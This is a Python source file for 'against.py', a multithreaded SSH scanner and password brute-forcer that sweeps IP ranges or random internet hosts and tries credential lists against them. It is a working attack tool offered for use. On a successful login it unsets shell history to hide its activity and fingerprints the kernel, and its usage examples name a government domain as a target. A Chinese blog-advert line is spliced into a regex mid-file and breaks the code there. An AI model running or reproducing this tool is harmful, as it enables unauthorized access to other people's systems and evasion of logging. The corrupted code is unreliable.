- #!/usr/bin/env python
- # -*- coding: latin-1 -*- ######################################################
- # ____ _ __ #
- # ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
- # / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
- # /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
- # /___/ team #
- # #
- # against.py - mass scanning and brute-forcing script for ssh #
- # #
- # FILE #
- # against.py #
- # #
- # DATE #
- # 2014-02-27 #
- # #
- # 'against.py' is a very fast ssh attacking script which includes a #
- # multithreaded port scanning module (tcp connect) for discovering possible #
- # targets and a multithreaded brute-forcing module which attacks #
- # parallel all discovered hosts or given ip addresses from a list. #
- # #
- # AUTHOR #
- # pgt - http://www.nullsecurity.net/ #
- # #
- # TODO #
- # - keyboard-interactive handler #
- # - scan ip address ranges randomly #
- # #
- # v0.2 #
- # - prints kernel version after login #
- # - optimized timings when cracking #
- # - detection for key authentication #
- # - false positive / small honeypot detection #
- # - save found target ip addresses to file, -O option #
- # - 127.x.x.x will be excluded when scanning for random ip addresses #
- # - unsort found target ip addresses, because of sequential port scanning #
- # - resolve ip address by given hostname #
- # - stop attacks on target when keyboard-interactive is required #
- # - set threads for port scanning, -s option #
- # #
- ################################################################################
- from socket import *
- import multiprocessing
- import threading
- import time
- import paramiko
- import sys
- import os
- import logging
- import argparse
- import random
- import re
- # version of against.py
- VERSION = 'v0.2'
- # print our nice banner ;)
- def banner():
- print '--==[ against.py by pgt@nullsecurity.net ]==--'
- # print version
- def version():
- print '[+] against.py %s' % (VERSION)
- sys.exit(0)
- # check if we can write to file
- def test_file(filename):
- try:
- outfile = open(filename, 'a')
- outfile.close()
- except IOError:
- print '[!] ERROR: cannot write to file \'%s\'' % filename
- sys.exit(1)
- # define command line parameters and help page
- def argspage():
- parser = argparse.ArgumentParser(
- usage = '\n\n ./%(prog)s -i <arg> | -r <arg> | -I <arg>',
- formatter_class = argparse.RawDescriptionHelpFormatter,
- epilog =
- 'examples:\n\n'
- ' attack single target\n'
- ' usage: ./%(prog)s -i nsa.gov -L passwords.txt\n\n'
- ' scanning and attacking an ip-range\n'
- ' usage: ./%(prog)s -i 192.168.0-10.1-254 -u admin -l troll -s 500',
- add_help = False
- )
- options = parser.add_argument_group('options', '')
- options.add_argument('-i', default=False, metavar='<ip/range>',
- help='ip address/ip range/domain (e.g.: 192.168.0-3.1-254)')
- options.add_argument('-I', default=False, metavar='<file>',
- help='list of targets')
- options.add_argument('-r', default=False, metavar='<num>',
- help='attack random hosts')
- options.add_argument('-p', default=22, metavar='<num>',
- help='port number of sshd (default: 22)')
- options.add_argument('-t', default=4, metavar='<num>',
- help='threads per host (default: 4)')
- options.add_argument('-f', default=8, metavar='<num>',
- help='attack max hosts parallel (default: 8)')
- options.add_argument('-u', default='root', metavar='<username>',
- help='single username (default: root)')
- options.add_argument('-U', default=False, metavar='<file>',
- help='list of usernames')
- options.add_argument('-l', default='toor', metavar='<password>',
- help='single password (default: toor)')
- options.add_argument('-L', default=False, metavar='<file>',
- help='list of passwords')
- options.add_argument('-o', default=False, metavar='<file>',
- help='write found logins to file')
- options.add_argument('-O', default=False, metavar='<file>',
- help='write found target ip addresses to file')
- options.add_argument('-s', default=200, metavar='<num>',
- help='threads when port scanning (default: 200)')
- options.add_argument('-T', default=3, metavar='<sec>',
- help='timeout in seconds (default: 3)')
- options.add_argument('-V', action='store_true',
- help='print version of against.py and exit')
- args = parser.parse_args()
- if args.V:
- version()
- if (args.i == False) and (args.I == False) and (args.r == False):
- print ''
- parser.print_help()
- sys.exit(0)
- return args
- # write found ip addresses / logins to file
- def write_to_file(filename, text):
- outfile = open(filename, 'a')
- outfile.write(text)
- outfile.close()
- # connect to target and checks for an open port
- def scan(target, port, timeout, oips):
- sock = socket(AF_INET, SOCK_STREAM)
- sock.settimeout(timeout)
- result = sock.connect_ex((target, port))
- sock.close()
- if result == 0:
- HOSTLIST.append(target)
- if oips:
- write_to_file(oips, target + '\n')
- # control the maximum number of threads
- def active_threads(threads, waittime):
- while threading.activeCount() > threads:
- time.sleep(waittime)
- # create thread and call scan()
- def thread_scan(args, target):
- port = int(args.p)
- timeout = float(args.T)
- oips = args.O
- threads = int(args.s)
- bam = threading.Thread(target=scan, args=(target, port, timeout, oips))
- bam.start()
- active_threads(threads, 0.0001)
- time.sleep(0.001)
- # only the output when scanning for targets
- def scan_output(i):
- sys.stdout.flush()
- sys.stdout.write('\r[*] hosts scanned: {0} | ' \
- 'possible to attack: {1}'.format(i, len(HOSTLIST)))
- # handle format of given target(s)
- def check_targets(targets):
- if re.match(r'^[0-9.\-]*
- 我的新博客:[url]http://hi.baidu.com/youthjumbo[/url], targets):
- return targets
- try:
- target = gethostbyname(targets)
- return target
- except gaierror:
- print '[-] \'%s\' is unreachable' % (targets)
- finished()
- sys.exit(1)
- # unsort found hosts, because of incremental scanning
- def unsort_hostlist():
- print '[*] unsort host list'
- for i in range(15):
- random.shuffle(HOSTLIST)
- # handle ip range format from command line
- def handle_ip_range(iprange):
- parted = tuple(part for part in iprange.split('.'))
- rsa = range(4)
- rsb = range(4)
- for i in range(4):
- hyphen = parted[i].find('-')
- if hyphen != -1:
- rsa[i] = int(parted[i][:hyphen])
- rsb[i] = int(parted[i][1+hyphen:]) + 1
- else:
- rsa[i] = int(parted[i])
- rsb[i] = int(parted[i]) + 1
- return (rsa, rsb)
- # call thread_scan() with target ip addresses
- def ip_range(args):
- targets = check_targets(args.i)
- rsa, rsb = handle_ip_range(targets)
- print '[*] scanning %s for ssh services' % targets
- counter = 0
- for i in range(rsa[0], rsb[0]):
- for j in range(rsa[1], rsb[1]):
- for k in range(rsa[2], rsb[2]):
- for l in range(rsa[3], rsb[3]):
- target = '%d.%d.%d.%d' % (i, j, k, l)
- counter += 1
- scan_output(counter)
- thread_scan(args, target)
- # waiting for the last running threads
- active_threads(1, 0.1)
- scan_output(counter)
- print '\n[*] finished scan'
- # create ip addresses
- def randip():
- rand = range(4)
- for i in range(4):
- rand[i] = random.randrange(0, 256)
- # exclude 127.x.x.x
- if rand[0] == 127:
- randip()
- ipadd = '%d.%d.%d.%d' % (rand[0], rand[1], rand[2], rand[3])
- return ipadd
- # create random ip addresses
- def rand_ip(args):
- i = 0
- print '[*] scanning random ips for ssh services'
- while len(HOSTLIST) < int(args.r):
- i += 1
- scan_output(i)
- thread_scan(args, randip())
- # waiting for the last running threads
- active_threads(1, 1)
- scan_output(i)
- print '\n[*] finished scan.'
- # checks if given filename by parameter exists
- def file_exists(filename):
- try:
- open(filename).readlines()
- except IOError:
- print '[!] ERROR: cannot open file \'%s\'' % filename
- sys.exit(1)
- # read-in a file with ip addresses
- def ip_list(ipfile):
- file_exists(ipfile)
- targets = open(ipfile).readlines()
- for target in targets:
- HOSTLIST.append(target)
- # connect to target and try to login
- def crack(target, port, user, passwd, outfile, timeo, i):
- ssh = paramiko.SSHClient()
- ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
- user = user.replace('\n', '')
- passwd = passwd.replace('\n', '')
- try:
- ssh.connect(target, port=port, username=user, password=passwd,
- timeout=timeo, pkey=None, allow_agent=False)
- time.sleep(3)
- try:
- ssh.exec_command('unset HISTFILE ; unset HISTSIZE')
- time.sleep(1)
- ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command('uname -a ' \
- '|| cat /proc/version')
- output = 'kernel: %s' \
- % (ssh_stdout.readlines()[0].replace('\n', ''))
- except:
- output = 'info: maybe a honeypot or false positive'
- login = '[+] login found for %s | %s:%s\n' \
- '[!] %s' % (target, user, passwd, output)
- print login
- if outfile:
- write_to_file(outfile, login + '\n')
- ssh.close()
- os._exit(0)
- except paramiko.AuthenticationException, e:
- ssh.close()
- exception = str(e)
- if '[\'publickey\']' in exception:
- print '[-] key authentication only - ' \
- 'stopped attack against %s' % (target)
- os._exit(1)
- elif '\'keyboard-interactive\'' in exception:
- print '[-] %s requires \'keyboard-interactive\' handler' % (target)
- os._exit(1)
- except:
- ssh.close()
- # after 3 timeouts per request the attack against $target will stopped
- if i < 3:
- i += 1
- # reconnect after random seconds (between 0.6 and 1.2 sec)
- randtime = random.uniform(0.6, 1.2)
- time.sleep(randtime)
- crack(target, port, user, passwd, outfile, timeo, i)
- else:
- print '[-] too many timeouts - stopped attack against %s' % (target)
- os._exit(1)
- # create 'x' number of threads and call crack()
- def thread_it(target, args):
- port = int(args.p)
- user = args.u
- userlist = args.U
- password = args.l
- passlist = args.L
- outfile = args.o
- timeout = float(args.T)
- threads = int(args.t)
- if userlist:
- users = open(userlist).readlines()
- else:
- users = [user]
- if passlist:
- passwords = open(passlist).readlines()
- else:
- passwords = [password]
- # try/except looks dirty but we need it :/
- try:
- for user in users:
- for password in passwords:
- Run = threading.Thread(target=crack, args=(target, port, user,
- password, outfile, timeout, 0,))
- Run.start()
- # checks that we a max number of threads
- active_threads(threads, 0.01)
- time.sleep(0.1)
- # waiting for the last running threads
- active_threads(1, 1)
- except KeyboardInterrupt:
- os._exit(1)
- # create 'x' child processes (child == cracking routine for only one target)
- def fork_it(args):
- threads = int(args.t)
- childs = int(args.f)
- len_hosts = len(HOSTLIST)
- print '[*] attacking %d target(s)\n' \
- '[*] cracking up to %d hosts parallel\n' \
- '[*] threads per host: %d' % (len_hosts, childs, threads)
- i = 1
- for host in HOSTLIST:
- host = host.replace('\n', '')
- print '[*] performing attacks against %s [%d/%d]' % (host, i, len_hosts)
- hostfork = multiprocessing.Process(target=thread_it, args=(host, args))
- hostfork.start()
- # checks that we have a max number of childs
- while len(multiprocessing.active_children()) >= childs:
- time.sleep(0.001)
- time.sleep(0.001)
- i += 1
- # waiting for child processes
- while multiprocessing.active_children():
- time.sleep(1)
- # \(0.o)/
- def empty_hostlist():
- if len(HOSTLIST) == 0:
- print '[-] found no targets to attack!'
- finished()
- sys.exit(1)
- # output when against.py finished all routines
- def finished():
- print '[*] game over!!!'
- def main():
- banner()
- args = argspage()
- if args.U:
- file_exists(args.U)
- if args.L:
- file_exists(args.L)
- if args.o:
- test_file(args.o)
- if args.O:
- test_file(args.O)
- if args.i:
- ip_range(args)
- unsort_hostlist()
- elif args.I:
- ip_list(args.I)
- else:
- rand_ip(args)
- time.sleep(0.1)
- empty_hostlist()
- fork_it(args)
- finished()
- if __name__ == '__main__':
- try:
- logging.disable(logging.CRITICAL)
- main()
- except KeyboardInterrupt:
- print '\nbye bye!!!'
- time.sleep(0.2)
- os._exit(1)
我的新博客:http://hi.baidu.com/youthjumbo |